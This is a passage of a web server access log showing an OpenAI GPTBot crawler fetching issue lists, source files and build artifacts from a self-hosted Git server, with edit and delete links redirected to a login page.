Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11197] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" +[17/Feb/2026:18:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" +[17/Feb/2026:18:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15265] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:18:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:18:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" +[17/Feb/2026:18:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:18:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:18:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 11176] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:18:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:18:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:18:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 11107] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:57:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:18:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:18:57:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 